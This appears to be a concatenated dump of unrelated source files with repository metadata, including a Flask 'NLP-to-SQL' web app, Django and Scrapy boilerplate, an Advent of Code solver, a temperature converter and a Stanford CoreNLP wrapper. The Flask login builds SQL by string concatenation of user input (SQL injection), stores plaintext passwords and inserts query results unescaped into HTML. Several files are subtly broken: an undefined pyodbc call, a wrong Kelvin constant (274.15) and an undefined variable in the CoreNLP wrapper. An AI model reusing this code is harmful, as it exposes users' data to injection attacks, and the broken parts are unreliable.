plt.scatter(range(len(us_csv_file1)), [int(item[1]) for item in us_csv_file1], c='g', marker=(5,2), label="Second")
plt.scatter(range(len(us_csv_file2)), [int(item[1]) for item in us_csv_file2], c='r', marker=(5,1), label="Third")
#indicates the label names at the given spot
plt.legend(loc='upper right')
#Creates grid for x-y axises
plt.grid(True)
#Creates wrapped title for the graph
plt.title("\n".join(wrap("longlonglonglonglonglonglonglonglonglonglonglonglonglongTITLETITLETITLETITLETITLETITLE")),size = 9.5)
#x-y labels for the graph
plt.xlabel("Node Names", fontsize = 8)
plt.ylabel("Run Times", fontsize = 8)
#print(len(csv_file))
#ticks - x and y axisses' data format.
plt.xticks(np.arange(0,len(csv_file)+1)[::20], csv_file[::20], rotation=90, size=8)
plt.yticks(np.arange(0,11000,1000), size=8)
#Saves a PNG file of the current graph to the folder and updates it every time
plt.savefig('./test.png', bbox_inches='tight')
# Not to cut-off bottom labels(manually) - enlarges bottom
plt.gcf().subplots_adjust(bottom=0.23)
plt.show()
|
[
"noreply@github.com"
] |
noreply@github.com
|
8b3b3960ebd3fd7d6bf7249c9d89919297d180f7
|
48fec8e7f098c63271dab124e9c9212045243835
|
/portal/migrations/0002_auto_20200117_1637.py
|
06523f94f717e162470c67083384af39513b4008
|
[] |
no_license
|
JoseGuiFerreira17/blog
|
aa63ad09376c90c15746ddf670b9680c3be61b4b
|
898aafe9822090f5a84216f293e05ab9105537e2
|
refs/heads/master
| 2022-11-16T19:11:58.435979
| 2020-01-20T21:27:50
| 2020-01-20T21:27:50
| 233,690,437
| 0
| 1
| null | 2022-10-31T21:54:48
| 2020-01-13T20:48:11
|
Python
|
UTF-8
|
Python
| false
| false
| 376
|
py
|
# Generated by Django 2.0.13 on 2020-01-17 19:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('portal', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='noticia',
name='data_publicacao',
field=models.DateTimeField(),
),
]
|
[
"guibsonmouta15@gmail.com"
] |
guibsonmouta15@gmail.com
|
6520de1e7283c3c146a41702b0b5714a85365863
|
6235f2ac2b43ec57fc778ac32134f66f6217f1fb
|
/day5-2.py
|
b971f59e9a987bd1dd4fc4944abf2dbb2e8f2fe4
|
[] |
no_license
|
jordan-heemskerk/aoc2017
|
2d0df0a056be78b0eb8d404e1cfcd25eb5c760bd
|
d6ae307acad612c6be2dc8ee06805937316a8dd3
|
refs/heads/master
| 2021-08-28T18:37:39.833809
| 2017-12-13T00:09:31
| 2017-12-13T00:09:31
| 113,126,920
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,313
|
py
|
ins = """2
2
-1
1
-1
1
1
-5
-5
-1
0
-8
-2
-11
-4
-5
-10
-4
-9
-9
1
1
-11
-8
-19
-14
-6
-2
-1
-11
-23
-8
-7
-9
-26
-1
-8
-11
-34
0
-22
-17
-41
-12
-43
-33
-15
0
2
-41
-41
-26
-48
-52
-47
-30
-38
-20
-4
-21
-17
-19
-55
-32
-12
-55
1
-34
-8
-15
-59
-56
-16
-23
-43
-5
-41
-56
-32
-67
-14
0
-28
-32
-7
-54
-19
-9
-24
-63
-2
-60
-5
-78
-11
-84
-50
-36
-72
-14
-30
-4
-62
-6
-1
-69
-17
-33
-32
-45
-71
-87
-71
-60
-19
-80
-11
-106
-45
-27
-23
-51
-77
-67
-103
-17
-98
-109
-91
-125
-68
-39
-34
-96
-49
-64
-38
-105
-31
-100
-89
-108
-69
-36
-94
-38
-124
-123
-79
-92
-42
-14
-87
-68
-17
-36
-21
-54
-98
-79
-142
-25
-60
-112
-99
-64
-15
-78
-37
-64
-15
-129
-32
-102
-74
-112
1
-146
-151
-147
-153
-4
-181
-22
-176
-4
-57
-151
-86
-121
-38
-137
-160
-156
-72
-73
-149
-64
-182
-117
-146
-180
-195
-27
-194
-191
-108
-153
-40
-149
-100
-120
-207
-83
-94
-73
-200
-95
-155
-94
-76
-9
-149
-70
-125
-49
-146
-223
-68
-139
-26
-132
-142
-165
-2
-45
-154
-129
-130
-185
-60
-34
-173
-91
-37
-40
-153
-189
-236
-95
-128
-46
-14
-53
-245
-67
-9
-208
-244
-198
-74
-62
-104
-51
-251
-48
-50
-115
-76
-79
-32
-82
-65
-185
-124
-32
-189
-124
-174
1
-273
-223
-275
-238
-200
-184
-229
-195
-152
-63
-150
-73
-44
-54
-187
-49
-250
-192
-290
-282
-266
-214
-117
-199
-83
-104
-251
-176
-262
-296
-39
-259
-87
-132
-166
-67
-194
1
-294
-8
-3
-264
-217
-228
-233
-241
-294
-210
-72
-307
-259
-33
-101
-103
-235
-100
-110
-253
-292
-134
-269
-52
-265
-15
-29
-272
-126
-210
-151
-308
-40
-40
-112
-268
-185
-346
-237
-287
-34
-302
-41
-25
-191
-29
-170
-95
-315
-278
-160
-220
-99
-126
-224
-33
-350
-76
-138
-340
-284
-268
-128
-238
-197
-93
-110
-120
-190
-140
-64
-217
-296
-103
-363
-199
-254
-233
-190
-282
-136
-174
-309
-61
-206
-18
-105
-111
-163
-287
-188
-145
-294
-251
-398
-265
-273
-50
-250
-376
-5
-357
-6
-8
-198
-20
-82
-158
-122
-196
-97
-183
-48
-428
-36
-88
-424
-35
-380
-109
-209
-323
-394
-102
-276
-153
-229
-320
-391
-7
-328
-127
-430
-102
-372
-447
-222
-401
-184
-183
-49
-239
-413
-101
-187
-289
-12
-418
-248
-279
-318
-134
-443
-272
-456
-143
-3
-209
-276
-414
-189
-302
-238
-241
-106
-332
-375
-400
-476
-9
-95
-412
-52
-127
-442
-278
-25
-446
-411
-39
-55
-80
-234
-361
-223
-384
-283
-47
-164
-18
-38
-87
-393
-93
-380
-493
-73
-150
-241
-378
-211
-516
-349
-520
-38
-397
-406
-16
-461
-276
-448
-316
-376
-156
-369
-216
-431
-309
-400
-135
-523
-40
-508
-87
-25
-151
-355
-141
-3
-495
-153
-438
-343
-161
-66
-455
-70
-248
-278
-548
-300
-337
-290
-551
-200
-68
-540
-476
-395
-245
-318
-424
-112
-556
-541
-94
-148
-542
-100
-120
-199
-569
-471
-298
-16
-453
-469
-50
-500
-84
-435
-579
-287
-522
-77
-83
-347
-437
-171
-231
-139
-350
-357
-221
-214
-224
-148
-125
-385
-255
-38
-320
-254
-517
-532
-80
-286
-58
-97
-390
-309
-548
-319
-323
-238
-297
-12
-312
-517
-434
-466
-103
-621
-448
-503
-72
-601
-287
-61
-577
-87
-143
-33
-482
-275
-529
-340
-279
-130
-512
-63
-109
-528
-22
-549
-317
-375
-377
-385
-23
-191
-138
-509
-40
-565
-559
-14
-547
-28
-159
-153
-585
-508
-582
-431
-580
-637
-561
-513
-243
-420
-298
-485
-132
-613
-157
-521
-596
-61
-420
-498
-577
-563
-354
-662
-264
-273
-111
-597
-466
-389
-345
-306
-102
-57
-596
-1
-45
-12
-619
-47
-43
0
-323
-9
-319
-529
-402
-238
-191
-487
-315
-65
-386
-110
-605
-363
-461
-6
-95
-95
2
-596
-454
-618
-83
-481
-283
-386
-247
-417
-707
-564
-603
-17
-712
-140
-336
-567
-443
-36
-476
-251
-735
-589
-198
-197
-476
-49
-736
-422
-383
-569
-732
-1
-104
-261
-352
-453
-273
-344
-66
-307
-698
-158
-238
-280
-207
-624
-491
-765
-506
-146
-616
-711
-650
-655
-393
-19
-315
-311
-572
-675
-533
-156
-373
-744
-142
-582
-491
-796
-777
-125
-483
-426
-510
-560
-700
-778
-407
-440
-409
-238
-738
-477
-147
-152
-317
-110
-323
-788
-601
-202
-517
-487
-726
-300
-1
-554
-448
-15
-191
-531
-568
-466
-527
-132
-254
-290
-8
-400
-655
-788
-376
-249
-662
-315
-378
-41
-793
-163
-29
-327
-839
-133
-124
-129
-673
-32
-605
-393
-664
-374
-135
-366
-717
-93
-601
-763
-788
-494
-802
-282
-443
-491
-461
-197
-83
-96
-162
-97
-161
-232
-144
-472
-118
-429
-387
-724
-789
-636
-298
-484
-720
-526
-382
-102
-449
-846
-525
-547
-696
-524
-272
-843
-286
-247
-838
-447
-489
-797
-483
-386
-775
-340
-772
-158
-293
-256
-432
-812
-273
-93
-487
-264
-594
-330
-712
-798
-131
-591
-539
-677
-455
-470
-108
-573
-57
-845
-383
-273
-890
-747
-913
-648
-625
-650
-544
-137
-490
-434
-734
-182
-355
-859
-835
-141
-536
-874
-102
-940
-359
-83
-800
-894
-712
-470
-687
-578
-435
-935
-400
-780
-814
-458
-892
-481
-371
-761
-348
-388
-891
-764
-297
-536
-695
-314
-336
-978
-379
-462
-597
-533
-561
-9
-474
-292
-560
-420
-828
-721
-769
-874
-157
-495
-771
-899
-571
-98
-282
-233
-203
-982
-416
-142
-993
-540
-979
-851
-506
-238
-292
-184
-695
-195
-632
-575
-962
-76
-546
-705
-13
-271
-222
-124
-380
2
-1003
-251
-525
-228
-644
-159
-624
-477
-912
-712
-343
-263
-88
-745
-85
-374
-675
-804
-610
-854
-511
-612
-964
-731
-358
-495
-946
-466
-364
-1053
-57
-101
-829
-155
-600"""
instructions = [int(k.strip()) for k in ins.split("\n") if k != ""]
steps = 0
curr_idx = 0
while True:
if curr_idx < 0 or curr_idx >= len(instructions):
break
old_idx = curr_idx
curr_idx += instructions[old_idx]
if instructions[old_idx] >= 3:
instructions[old_idx] -= 1
else:
instructions[old_idx] += 1
steps += 1
print steps
|
[
"jheemskerk@urthecast.com"
] |
jheemskerk@urthecast.com
|
ed765f88d3e774913278c6c0f4f26a09b44c2a8c
|
46021d3ecdbfc65c3c75ba760af52b22775244ad
|
/NLP-SQL/NLP-SQL/nlp-sql.py
|
d765287dcc07a7adf0ebe610a1832bd58dde945c
|
[] |
no_license
|
rakshitha1209/DS_Projects
|
7d2f0f42057c534953b716e39b13341fa975c8a9
|
70365368c4b76816c52730f7c0d395d921d0f252
|
refs/heads/master
| 2022-12-16T18:51:31.947836
| 2020-09-15T14:13:35
| 2020-09-15T14:13:35
| 295,747,669
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,921
|
py
|
from flask import Flask,session,render_template,request,jsonify, redirect,url_for
import main
#importing package to connect flask to mysql database
from flaskext.mysql import MySQL
#flask app
nlpsql = Flask(__name__)
nlpsql.secret_key = 'nlpsql key'
mysql = MySQL(nlpsql)
#database Configuration
nlpsql.config['SQL_DATABASE_DB'] = 'nlpproj'
nlpsql.config['SQL_DATABASE_HOST'] = 'Server'
#start flask app
pyodbc.init_app(nlpsql)
#route for home
@nlpsql.route('/')
def home():
if 'error' in session:
error=session['error']
session.pop('error',None)
else:
error=''
return render_template('login.html',error=error)
#route for getting example pdf
@nlpsql.route('/results')
def returnResultsPDF():
file_name = 'results.pdf'
return redirect(url_for('static', filename='/'.join(['doc', file_name])), code=301)
@nlpsql.route('/logout')
def logout():
session.pop('error',None)
session.pop('access',None)
return redirect('/')
@nlpsql.route('/submitLogin',methods=['POST','GET'])
def processLogin():
username=request.form['username']
password=request.form['password']
query="select access,password from users where userid='"+username+"' ;"
cursor = mysql.connect().cursor()
cursor.execute(query)
data = cursor.fetchall()
print(data)
if(len(data)>0):
access = data[0][0]
session['access'] = access
if(data[0][1]==password):
return redirect('/index')
else:
session['error'] = 'Invalid Username or password'
return redirect('/')
else:
session['error'] = 'Invalid Username or password'
return redirect('/')
@nlpsql.route('/changeAccess',methods=['POST'])
def changeAccess():
userId = request.form['changeAccess']
access = request.form['accessMode']
conn=mysql.connect()
cursor = conn.cursor()
cursor.execute('''UPDATE users SET access=%s WHERE userid=%s;''' ,(access,userId))
conn.commit()
return redirect('/admin')
@nlpsql.route('/signup')
def getSignup():
return render_template('signup.html')
@nlpsql.route('/requestAuthentication',methods=['POST','GET'])
def getdetails():
access=request.form['desig']
access='2'
department=request.form['department']
password=request.form['password']
userId=request.form['userId']
name=request.form['name']
conn=mysql.connect()
cursor = conn.cursor()
cursor.execute('''INSERT INTO users(userid,password,access,name) VALUES (%s,%s,%s,%s);''' ,(userId,password,access,name))
conn.commit()
query="select * from users"
cursor.execute(query)
data = cursor.fetchall()
print(data)
return redirect('/index')
@nlpsql.route('/index')
def getConsole():
if 'access' in session:
access = session['access']
session.pop('access',None)
else:
access=2
return render_template('index.html',access=access)
@nlpsql.route('/admin')
def adminPanel():
query = 'SELECT * FROM users'
cursor = mysql.connect().cursor()
cursor.execute(query)
data = cursor.fetchall()
encodedData = []
for row in data:
encodedrow = []
for item in row:
if(isinstance(item,unicode)):
encodedrow.append(item.encode("utf-8"))
else:
encodedrow.append(item)
encodedData.append(encodedrow)
return render_template('admin.html',data=encodedData)
#getting mysql result for the input query
@nlpsql.route('/submitQuery',methods=['POST'])
def getQuery():
query=request.form['query']
print(query)
#processQuery converts the input query to mysql query
query = main.processQuery(query)
#execute mysql query
cursor = mysql.connect().cursor()
cursor.execute(query)
data = cursor.fetchall()
#converting from unicode to UTF-8
encodedData = []
for row in data:
encodedrow = []
for item in row:
if(isinstance(item,unicode)):
encodedrow.append(item.encode("utf-8"))
else:
encodedrow.append(item)
encodedData.append(encodedrow)
#creating html table for Query result
htmlResult="<span class='terminal-text-precommand'>user@snlp-sql</span><span class='terminal-text-command'>:~$ : <span class='terminal-text-command'>"+query+"</span><hr /><table class='table-bordered display-table'>"
for tableRow in encodedData:
htmlResult=htmlResult+"<tr>"
for tablecell in tableRow:
htmlResult=htmlResult+"<td>"+str(tablecell)+"</td>"
htmlResult=htmlResult+"</tr>"
htmlResult=htmlResult+"</table>"
#converts html to jason format
return jsonify(htmlResult)
#to get Student database similar to getQuery
@nlpsql.route('/showStudentDetails',methods=['POST'])
def showStudentDetails():
query="select * from student"
query = main.processQuery(query)
cursor = mysql.connect().cursor()
cursor.execute(query)
data = cursor.fetchall()
encodedData = []
for row in data:
encodedrow = []
for item in row:
if(isinstance(item,unicode)):
encodedrow.append(item.encode("utf-8"))
else:
encodedrow.append(item)
encodedData.append(encodedrow)
studentTable="";
for row in encodedData:
studentTable=studentTable+"<tr>"
for cell in row:
studentTable=studentTable+"<td>"+str(cell)+"</td>"
studentTable=studentTable+"</tr>"
studentTable=studentTable+""
print(studentTable)
return jsonify(studentTable)
#to get department database similar to getQuery
@nlpsql.route('/showDepartmentDetails',methods=['POST'])
def showDepartmentDetails():
query="select * from department"
query = main.processQuery(query)
cursor = mysql.connect().cursor()
cursor.execute(query)
data = cursor.fetchall()
encodedData = []
for row in data:
encodedrow = []
for item in row:
if(isinstance(item,unicode)):
encodedrow.append(item.encode("utf-8"))
else:
encodedrow.append(item)
encodedData.append(encodedrow)
departmentTable="";
for row in encodedData:
departmentTable=departmentTable+"<tr>"
for cell in row:
departmentTable=departmentTable+"<td>"+str(cell)+"</td>"
departmentTable=departmentTable+"</tr>"
print(departmentTable)
return jsonify(departmentTable)
#main function which runs the flask app
if __name__ == '__main__':
nlpsql.run()
|
[
"rakshitha1209@gmail.com"
] |
rakshitha1209@gmail.com
|
7dc0470973a257ec8d054571e176cdb67ef27fce
|
2bd19f3859fa5ef5fd705062577c8a8d9819ad33
|
/tempcon.py
|
38042bdf282a55ef99358af99fa4256a6d76e5fc
|
[
"MIT"
] |
permissive
|
itsayushprajapati/temperatureconverter
|
349de48fae1b55f4d678163e909e738884c03871
|
1595f36bd126c190cd430ddf55306bba2628aec4
|
refs/heads/master
| 2022-11-10T09:14:14.858402
| 2020-06-22T09:28:46
| 2020-06-22T09:28:46
| 272,431,849
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,160
|
py
|
#TempratureConverter
class Conversion:
"""\'Conversion\' class for conversion of temperature units .\n Use help for more -> help(temprature) """
def __init__(self,cel=0, fahrenheit=0,kelvin=0):
self.cel=cel
self.fahrenheit=fahrenheit
self.kelvin=kelvin
def ctof(self):
"""Method to convert Celcuis to Fahrenheit"""
var=self.cel*9+160
fahrenheit=var/5
return f"Temprature in Fahrenheit -> {fahrenheit}°F"
def ctok(self):
"""Method to convert Celcius to Kelvin"""
kelvin=self.cel+274.15
return f"Temprature in Kelvin -> {kelvin}"
def ftoc(self):
"""Method to convert Fahrenheit to Celcius"""
var=(self.fahrenheit-32)/9
celcius=var*5
return f"Temprature in Celcius -> {celcius}°C"
def ktoc(self):
"""Method to convert Kelvin to Celcius -- Coming Soon"""
pass
@property
def info(self):
return f"Celcius -> {self.cel}° Fahrenheit -> {self.fahrenheit}° Kelvin -> {self.kelvin}°"
class Defination:
def __init__(self,status=False):
self.status=status
def getdef(self):
if self.status==True:
return f"Celcius - The Celsius scale, also known as the centigrade scale, is a temperature scale. As an SI derived unit, it is used worldwide. However, in the United States, the Bahamas, Belize, the Cayman Islands, and Liberia, Fahrenheit remains the preferred scale for everyday temperature measurement. The degree Celsius (symbol: °C) can refer to a specific temperature on the Celsius scale or a unit to indicate a difference between two temperatures or an uncertainty. -- Wiki\n\nFahrenheit - The Fahrenheit scale is a temperature scale based on one proposed in 1724 by physicist Daniel Gabriel Fahrenheit. It uses the degree Fahrenheit as the unit. Several accounts of how he originally defined his scale exist. -- Wiki \n\nKelvin - The kelvin is the base unit of temperature in the International System of Units (SI), having the unit symbol K. It is named after the Belfast-born, Glasgow University engineer and physicist William Thomson, 1st Baron Kelvin (1824–1907). -- Wiki"
else:
return "Turn Status to \'True\'"
|
[
"noreply@github.com"
] |
noreply@github.com
|
8a16091fafc3f2319884a057c8e434ab0e79a775
|
7759c0ad152fe9c369b074a24601e54806b0afa8
|
/backend/event/api/v1/viewsets.py
|
4cba77ae5ad9f884a97fa17647488092f6c46aa1
|
[] |
no_license
|
crowdbotics-apps/covidcheck-15163
|
be59f495e31b50948725fb332429751749f9b611
|
a2f80fc2541bbc069cf3ec6a7f4d740aa665c77b
|
refs/heads/master
| 2023-02-08T22:01:35.813215
| 2020-03-29T16:50:54
| 2020-03-29T16:50:54
| 250,877,575
| 0
| 0
| null | 2023-01-24T01:47:09
| 2020-03-28T19:33:39
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 3,066
|
py
|
from rest_framework import authentication
from event.models import (
Category,
Faq,
Favorites,
Location,
MySchedule,
Presenter,
Schedule,
Sponsor,
Vendor,
VendorDetail,
)
from .serializers import (
CategorySerializer,
FaqSerializer,
FavoritesSerializer,
LocationSerializer,
MyScheduleSerializer,
PresenterSerializer,
ScheduleSerializer,
SponsorSerializer,
VendorSerializer,
VendorDetailSerializer,
)
from rest_framework import viewsets
class MyScheduleViewSet(viewsets.ModelViewSet):
    """CRUD REST endpoints for MySchedule records (session or token auth)."""

    serializer_class = MyScheduleSerializer
    queryset = MySchedule.objects.all()
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
class CategoryViewSet(viewsets.ModelViewSet):
    """CRUD REST endpoints for Category records (session or token auth)."""

    serializer_class = CategorySerializer
    queryset = Category.objects.all()
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
class LocationViewSet(viewsets.ModelViewSet):
    """CRUD REST endpoints for Location records (session or token auth)."""

    serializer_class = LocationSerializer
    queryset = Location.objects.all()
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
class PresenterViewSet(viewsets.ModelViewSet):
    """CRUD REST endpoints for Presenter records (session or token auth)."""

    serializer_class = PresenterSerializer
    queryset = Presenter.objects.all()
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
class VendorViewSet(viewsets.ModelViewSet):
    """CRUD REST endpoints for Vendor records (session or token auth)."""

    serializer_class = VendorSerializer
    queryset = Vendor.objects.all()
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
class FaqViewSet(viewsets.ModelViewSet):
    """CRUD REST endpoints for Faq records (session or token auth)."""

    serializer_class = FaqSerializer
    queryset = Faq.objects.all()
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
class ScheduleViewSet(viewsets.ModelViewSet):
    """CRUD REST endpoints for Schedule records (session or token auth)."""

    serializer_class = ScheduleSerializer
    queryset = Schedule.objects.all()
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
class SponsorViewSet(viewsets.ModelViewSet):
    """CRUD REST endpoints for Sponsor records (session or token auth)."""

    serializer_class = SponsorSerializer
    queryset = Sponsor.objects.all()
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
class VendorDetailViewSet(viewsets.ModelViewSet):
    """CRUD REST endpoints for VendorDetail records (session or token auth)."""

    serializer_class = VendorDetailSerializer
    queryset = VendorDetail.objects.all()
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
class FavoritesViewSet(viewsets.ModelViewSet):
    """CRUD REST endpoints for Favorites records (session or token auth)."""

    serializer_class = FavoritesSerializer
    queryset = Favorites.objects.all()
    authentication_classes = (
        authentication.SessionAuthentication,
        authentication.TokenAuthentication,
    )
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
9b3e528238dee10f5bdee6ca543158322d95ff6a
|
a46d135ba8fd7bd40f0b7d7a96c72be446025719
|
/packages/python/plotly/plotly/validators/scattergl/_xsrc.py
|
2c107c6b510e42d803ee235a58aa1eabf4f21690
|
[
"MIT"
] |
permissive
|
hugovk/plotly.py
|
5e763fe96f225d964c4fcd1dea79dbefa50b4692
|
cfad7862594b35965c0e000813bd7805e8494a5b
|
refs/heads/master
| 2022-05-10T12:17:38.797994
| 2021-12-21T03:49:19
| 2021-12-21T03:49:19
| 234,146,634
| 0
| 0
|
MIT
| 2020-01-15T18:33:43
| 2020-01-15T18:33:41
| null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
import _plotly_utils.basevalidators
class XsrcValidator(_plotly_utils.basevalidators.SrcValidator):
    """Validator for the `xsrc` property of `scattergl` traces."""

    def __init__(self, plotly_name="xsrc", parent_name="scattergl", **kwargs):
        # Consume edit_type (defaulting to "none") before forwarding kwargs.
        edit_type = kwargs.pop("edit_type", "none")
        super(XsrcValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=edit_type,
            **kwargs
        )
|
[
"noreply@github.com"
] |
noreply@github.com
|
cf6f8f6d79e22e007355a72e0a66fc5164d27ac1
|
d3156e543582c201cb8ee76634736842232db6ff
|
/cwgmedaltally/middlewares.py
|
810dd12bfcc1a6d304782447440fefc9f5bd875d
|
[] |
no_license
|
Madhurmm/cwg_medal_tally
|
777b3b9c4abc7325e4b42cc9729b874de9f96e7d
|
a7915898252d715c19f011d31ebdecf1d7afc5f1
|
refs/heads/master
| 2020-03-11T03:05:52.651739
| 2018-04-18T14:18:48
| 2018-04-18T14:18:48
| 129,736,858
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,611
|
py
|
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class CwgmedaltallySpiderMiddleware(object):
    """Scrapy spider middleware (stock template; all hooks are pass-through).

    Methods not defined here are treated by Scrapy as if the middleware
    does not modify the passed objects.
    """

    @classmethod
    def from_crawler(cls, crawler):
        """Create the middleware and subscribe to the spider_opened signal."""
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened,
                                signal=signals.spider_opened)
        return middleware

    def process_spider_input(self, response, spider):
        """Let every response through to the spider unchanged."""
        return None

    def process_spider_output(self, response, result, spider):
        """Forward every item/request produced by the spider unchanged."""
        for item in result:
            yield item

    def process_spider_exception(self, response, exception, spider):
        """Spider exceptions are not handled here; they fall through."""
        pass

    def process_start_requests(self, start_requests, spider):
        """Forward the spider's start requests unchanged (no response yet)."""
        for request in start_requests:
            yield request

    def spider_opened(self, spider):
        """Log when the spider starts."""
        spider.logger.info('Spider opened: %s' % spider.name)
class CwgmedaltallyDownloaderMiddleware(object):
    """Scrapy downloader middleware (stock template; all hooks pass-through).

    Methods not defined here are treated by Scrapy as if the middleware
    does not modify the passed objects.
    """

    @classmethod
    def from_crawler(cls, crawler):
        """Create the middleware and subscribe to the spider_opened signal."""
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened,
                                signal=signals.spider_opened)
        return middleware

    def process_request(self, request, spider):
        """Continue normal processing of every outgoing request.

        Returning None tells Scrapy to keep running the middleware chain;
        other options are returning a Response/Request or raising
        IgnoreRequest.
        """
        return None

    def process_response(self, request, response, spider):
        """Return the downloaded response unchanged."""
        return response

    def process_exception(self, request, exception, spider):
        """Download exceptions are not handled here; they fall through."""
        pass

    def spider_opened(self, spider):
        """Log when the spider starts."""
        spider.logger.info('Spider opened: %s' % spider.name)
|
[
"madhurmm4u@gmail.com"
] |
madhurmm4u@gmail.com
|
959d35bd8673cfb03fa83975c5e4b466288fa86d
|
5825ee1ec0ba8c24ebe194beabf94bbb72ccaf99
|
/Building ontology/Merging_function.py
|
c443b86424da7eb0a06395e1f37a2c4ac5107c7d
|
[] |
no_license
|
uliana-sentsova/russian_SPARQL
|
fd272121429614d326d382ff49f679bb18b74b92
|
c593925ed311661dda3a5f3ebd3929707597fb50
|
refs/heads/master
| 2021-06-08T01:37:17.521784
| 2016-10-31T09:13:32
| 2016-10-31T09:13:32
| 56,520,739
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,067
|
py
|
# Merge parsed (surface-form, lemma) rows into one ontology line per lemma.
# Input:  PARSED.txt, tab-separated; column 0 is a comma-separated list of
#         word forms, column 1 is the key (lemma).
# Output: MAIN_ONTO_rivers.txt, "<merged forms>\t<key>" per line.
result = []
filename = "MAIN_ONTO_rivers.txt"
with open("PARSED.txt", 'r', encoding="utf-8") as f:
    for line in f:
        line = line.split("\t")
        line = [l.strip() for l in line]
        result.append(line)
print(len(result))

# First pass: keep the first row seen for each key; queue duplicates in `rest`.
dictionary = {}
checked = set()  # set instead of list: O(1) membership (was O(n) per row)
rest = []
for line in result:
    try:
        if line[1] not in checked:
            checked.add(line[1])
            dictionary[line[1]] = line[0]
        else:
            rest.append(line)
    except IndexError as err:
        # Malformed row without a key column: report and skip.
        print(err)
        print(line)
print(len(dictionary))
print(len(rest))

# Second pass: fold the word forms of each duplicate row into the stored
# entry, keeping the normalized form (last comma field) at the end.
for r in rest:
    string = dictionary[r[1]]
    string = string.split(",")
    normalized = string[-1]
    string = string[:-1]
    string_2 = r[0].split(",")
    string_2 = string_2[1:-1]
    for word in string_2:
        if word and word not in string:
            string.append(word)
    string.append(normalized)
    dictionary[r[1]] = ",".join(string)
print(len(dictionary))

# BUGFIX: write with explicit utf-8 — the data is Russian text and the input
# was read as utf-8; the platform default encoding could fail on Windows.
with open(filename, "w", encoding="utf-8") as f:
    for key, value in dictionary.items():
        f.write(value + "\t" + key + "\n")
|
[
"uliana.sentsova@gmail.com"
] |
uliana.sentsova@gmail.com
|
ff3179806be417683f17da0629967ff753f5acd1
|
c06d18ac5b87b3b82fc486454c422b119d6c1ee9
|
/src/demo/NLPBook/chapter5/stanford.py
|
e7a74651d98ea5d99c3a6e7fc528c3f3e51716fd
|
[] |
no_license
|
tangermi/nlp
|
b3a4c9612e6049463bf12bc9abb7aff06a084ace
|
aa36b8b20e8c91807be73a252ff7799789514302
|
refs/heads/master
| 2022-12-09T12:33:15.009413
| 2020-04-03T04:03:24
| 2020-04-03T04:03:24
| 252,056,010
| 0
| 0
| null | 2022-12-08T07:26:55
| 2020-04-01T02:55:05
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,411
|
py
|
# -*- coding: utf-8 -*-
import sys
import os
# CoreNLP 3.6 jar包和中文模型包
# ejml-0.23.jar
# javax.json.jar
# jollyday.jar
# joda-time.jar
# jollyday.jar
# protobuf.jar
# slf4j-api.jar
# slf4j-simple.jar
# stanford-corenlp-3.6.0.jar
# xom.jar
class StanfordCoreNLP(object):
    """Thin wrapper around the Stanford CoreNLP 3.6 command-line tools.

    Builds a ';'-separated Java classpath from a directory of jar files and
    provides temp-file helpers used by subclasses.
    """

    def __init__(self, jarpath):
        self.root = jarpath
        self.tempsrcpath = "tempsrc"  # scratch file holding the input text
        self.jarlist = ["ejml-0.23.jar", "javax.json.jar", "jollyday.jar",
                        "joda-time.jar", "protobuf.jar", "slf4j-api.jar",
                        "slf4j-simple.jar", "stanford-corenlp-3.6.0.jar",
                        "xom.jar"]
        self.jarpath = ""
        self.buildjars()

    def buildjars(self):
        """Append every known jar (prefixed with root) to the classpath string."""
        for jar in self.jarlist:
            self.jarpath += self.root + jar + ";"

    def savefile(self, path, sent):
        """Write `sent` to `path` in binary mode (expects bytes on Python 3)."""
        with open(path, "wb") as fp:
            fp.write(sent)

    def delfile(self, path):
        """Remove the temporary file at `path`."""
        os.remove(path)
class StanfordPOSTagger(StanfordCoreNLP):
def __init__(self,jarpath,modelpath):
StanfordCoreNLP.__init__(self,jarpath)
self.modelpath = modelpath # 模型文件路径
self.classfier = "edu.stanford.nlp.tagger.maxent.MaxentTagger"
self.delimiter = "/"
self.__buildcmd()
def __buildcmd(self): # 构建命令行
self.cmdline = 'java -mx1g -cp "'+self.jarpath+'" '+self.classfier+' -model "'+self.modelpath+'" -tagSeparator '+self.delimiter
def tag(self,sent): #标注句子
self.savefile(self.tempsrcpath,sent)
tagtxt = os.popen(self.cmdline+" -textFile "+self.tempsrcpath,'r').read() # 执行命令行
self.delfile(self.tempsrcpath)
return tagtxt
def tagfile(self,inputpath,outpath):# 标注文件
self.savefile(self.tempsrcpath,sent)
os.system(self.cmdline+' -textFile '+inputpath+' > '+outpath )
self.delfile(self.tempsrcpath)
def __buildprop(self): #创建属性文件
self.propline = 'java -mx1g -cp "'+self.jarpath+'" '+self.classfier+' -genprops'
def genpropfile(self,propath): # 获取属性文件
self.__buildprop()
propfile = os.popen(self.propline,'r').read()
self.savefile(propath,propfile)
print "save properties to ",propath
